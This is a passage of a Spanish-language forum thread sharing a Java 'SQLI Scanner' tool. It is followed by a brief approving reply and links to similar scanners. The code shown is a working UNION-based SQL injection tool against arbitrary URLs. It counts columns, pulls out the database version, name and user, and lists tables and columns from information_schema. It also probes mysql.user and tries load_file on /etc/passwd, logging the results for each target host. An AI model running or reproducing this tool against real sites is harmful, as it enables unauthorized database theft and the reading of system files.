  614.  
  615.             for (x = 0; x <= finals; x = x + 1) {
  616.  
  617.                 code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--");
  618.  
  619.                 uno = Pattern.compile("K0BRA(.*)K0BRA");
  620.                 dos = uno.matcher(code);
  621.  
  622.                 if (dos.find()) {
  623.                     System.out.println("[+] Column Found : " + dos.group(1));
  624.                     savefile(urla, "[+] Column Found : " + dos.group(1));
  625.                 }
  626.  
  627.             }
  628.  
  629.         } else {
  630.             System.out.println("[-] Not Found");
  631.         }
  632.  
  633.     }
  634.  
  635.     private static void schematables(String urla) throws Exception {
  636.  
  637.         String web1;
  638.         String web2;
  639.         String code;
  640.         int x;
  641.         Pattern uno = null;
  642.         Matcher dos = null;
  643.  
  644.         web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
  645.         web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
  646.  
  647.         System.out.println("\n[+] Getting tables ....\n");
  648.  
  649.         code = toma(web1 + "+from+information_schema.tables--");
  650.  
  651.         uno = Pattern.compile("K0BRA(.*)K0BRA");
  652.         dos = uno.matcher(code);
  653.  
  654.         if (dos.find()) {
  655.             System.out.println("[+] Tables Found : " + dos.group(1) + "\n");
  656.  
  657.             savefile(urla, "");
  658.  
  659.             int finals = Integer.parseInt(dos.group(1));
  660.  
  661.             for (x = 0; x <= finals; x = x + 1) {
  662.  
  663.                 code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--");
  664.  
  665.                 uno = Pattern.compile("K0BRA(.*)K0BRA");
  666.                 dos = uno.matcher(code);
  667.  
  668.                 if (dos.find()) {
  669.                     System.out.println("[+] Table Found : " + dos.group(1));
  670.                     savefile(urla, "[+] Table Found : " + dos.group(1));
  671.                 }
  672.  
  673.             }
  674.  
  675.         } else {
  676.             System.out.println("[-] Not Found");
  677.         }
  678.  
  679.     }
  680.  
  681.     private static void scan(String urla) throws Exception {
  682.  
  683.         String codex;
  684.         String target;
  685.  
  686.         Pattern uno = null;
  687.         Matcher dos = null;
  688.  
  689.         target = urla;
  690.  
  691.         System.out.println("\n[+] Checking ...\n");
  692.  
  693.         codex = toma(target + "-1+union+select+666--");
  694.  
  695.         uno = Pattern.compile("The used SELECT statements have a different number of columns");
  696.         dos = uno.matcher(codex);
  697.  
  698.         if (dos.find()) {
  699.             System.out.println("[+] Scanning ...\n");
  700.  
  701.             int x;
  702.             String urlfinal;
  703.             String otrofinal;
  704.             String code;
  705.             String formariny;
  706.             String otroformar;
  707.             String link;
  708.  
  709.             urlfinal = "";
  710.             formariny = "";
  711.  
  712.             for (x = 1; x <= 5; x = x + 1) {
  713.  
  714. //urlfinal = urlfinal+x+",";
  715.                 urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
  716.                 formariny = formariny + x + ",";
  717.  
  718.                 otrofinal = urlfinal;
  719.                 otroformar = formariny;
  720.  
  721.                 otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
  722.                 otroformar = otroformar.substring(0, otroformar.length() - 1);
  723.  
  724.                 code = toma(target + "-1+union+select+" + otrofinal);
  725.  
  726.                 uno = Pattern.compile("RATSXPDOWN(\\d+)");
  727.                 dos = uno.matcher(code);
  728.  
  729.                 if (dos.find()) {
  730.  
  731.                     otroformar = otroformar.replace(dos.group(1), "hackman");
  732.  
  733.                     link = target + "-1+union+select+" + otroformar;
  734.  
  735.                     System.out.println("[Target] : " + link);
  736.                     System.out.println("[Limit] : The site has " + x + " columns");
  737.                     System.out.println("[Data] : The number " + dos.group(1) + " print data");
  738.  
  739.                     savefile(link, "\r\n" + "[Target] : " + link);
  740.                     savefile(link, "[Limit] : The site has " + x + " columns");
  741.                     savefile(link, "[Data] : The number " + dos.group(1) + " print data");
  742.  
  743.                     manejo(link);
  744.  
  745.                     System.exit(1);
  746.  
  747.                 }
  748.  
  749.             }
  750.             System.out.println("[-] Error");
  751.         } else {
  752.             System.out.println("[-] Not vulnerable");
  753.         }
  754.  
  755.     }
  756.  
  757.     private static void details(String urla) throws Exception {
  758.  
  759.         String concat;
  760.         String code;
  761.  
  762.         Pattern uno = null;
  763.         Matcher dos = null;
  764.  
  765.         concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";
  766.  
  767.         urla = urla.replace("hackman", concat);
  768.  
  769.         System.out.println("\n[+] Searching informaion ...\n");
  770.  
  771.         code = toma(urla);
  772.  
  773.         uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
  774.         dos = uno.matcher(code);
  775.  
  776.         if (dos.find()) {
  777.             System.out.println("[+] DB Version : " + dos.group(1));
  778.             System.out.println("[+] DB Name : " + dos.group(2));
  779.             System.out.println("[+] Username : " + dos.group(3));
  780.  
  781.             savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1));
  782.             savefile(urla, "[+] DB Name : " + dos.group(2));
  783.             savefile(urla, "[+] Username : " + dos.group(3));
  784.  
  785.         } else {
  786.             System.out.println("[-] Not found any data");
  787.         }
  788.  
  789.         urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");
  790.  
  791.         code = toma(urla + "+from+information_schema.tables--");
  792.         uno = Pattern.compile("ERTOR854");
  793.         dos = uno.matcher(code);
  794.  
  795.         if (dos.find()) {
  796.             System.out.println("[+] information_schema : on");
  797.             savefile(urla, "[+] information_schema : on");
  798.         } else {
  799.             System.out.println("[-] information_schema : off");
  800.         }
  801.  
  802.         code = toma(urla + "+from+mysql.user--");
  803.         uno = Pattern.compile("ERTOR854");
  804.         dos = uno.matcher(code);
  805.  
  806.         if (dos.find()) {
  807.             System.out.println("[+] mysqluser : on");
  808.             savefile(urla, "[+] mysqluser : on");
  809.         } else {
  810.             System.out.println("[-] mysquser : off");
  811.         }
  812.  
  813.         urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");
  814.  
  815.         code = toma(urla);
  816.         uno = Pattern.compile("ERTOR854");
  817.         dos = uno.matcher(code);
  818.  
  819.         if (dos.find()) {
  820.             System.out.println("[-] load_file : on");
  821.             savefile(urla, "[-] load_file : on");
  822.         } else {
  823.             System.out.println("[-] load_file : off");
  824.         }
  825.  
  826.     }
  827.  
  828.     private static void savefile(String nombre, String texto) throws Exception {
  829.  
  830.         String formar;
  831.  
  832.         URL h = new URL(nombre);
  833.  
  834.         formar = "logs/" + h.getHost() + ".txt";
  835.  
  836.         FileWriter writer = new FileWriter(formar, true);
  837.         writer.write(texto + "\r\n");
  838.         writer.close();
  839.  
  840.     }
  841.  
  842.     private static String toma(String urla) throws Exception {
  843.  
  844.         String re;
  845.  
  846.         StringBuffer conte = new StringBuffer(40);
  847.  
  848.         URL url = new URL(urla);
  849.         URLConnection hc = url.openConnection();
  850.         hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  851.  
  852.         BufferedReader nave = new BufferedReader(
  853.                 new InputStreamReader(hc.getInputStream()));
  854.  
  855.         while ((re = nave.readLine()) != null) {
  856.             conte.append(re);
  857.         }
  858.  
  859.         nave.close();
  860.  
  861.         return conte.toString();
  862.  
  863.     }
  864.  
  865.     public static String encodehex(String text) {
  866.  
  867. //Thanks to Katarina Majetic
  868. //Based on http://www.dzone.com/snippets/encode-string-hex
  869.  
  870.         byte[] z = text.getBytes();
  871.         StringBuffer h = new StringBuffer();
  872.         String l;
  873.         int n;
  874.         int a = z.length;
  875.         int u;
  876.  
  877.         for (n = 0; n < a; n++) {
  878.             u = z[n] & 0x000000FF;
  879.             l = Integer.toHexString(u);
  880.             h.append(l);
  881.         }
  882.         return "0x" + h.toString();
  883.     }
  884. }
  885.  
  886. //The End ?
  887.  
En línea
Slider324

Desconectado Desconectado

Mensajes: 45


Ver Perfil
Re: [Java] SQLI Scanner 0.2
« Respuesta #1 en: 22 Enero 2013, 16:27 pm »
wow voy a darle una ojeada  ;-) ;-) muy buen trabajo
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Ruby] SQLI Scanner
Scripting 		BigBear 0 2,100 Último mensaje 7 Octubre 2011, 01:32 am
por BigBear
[Java] SQL Scanner 0.1
Java 		BigBear 2 2,452 Último mensaje 13 Enero 2013, 21:34 pm
por BigBear
[C#] SQLI Scanner 0.4
.NET (C#, VB.NET, ASP) 		BigBear 0 2,847 Último mensaje 18 Julio 2014, 01:36 am
por BigBear
[Ruby] SQLI Scanner 0.4
Scripting 		BigBear 0 1,832 Último mensaje 7 Agosto 2015, 22:25 pm
por BigBear
[Java] SQLI Scanner 0.4
Java 		BigBear 0 1,575 Último mensaje 5 Marzo 2016, 16:15 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines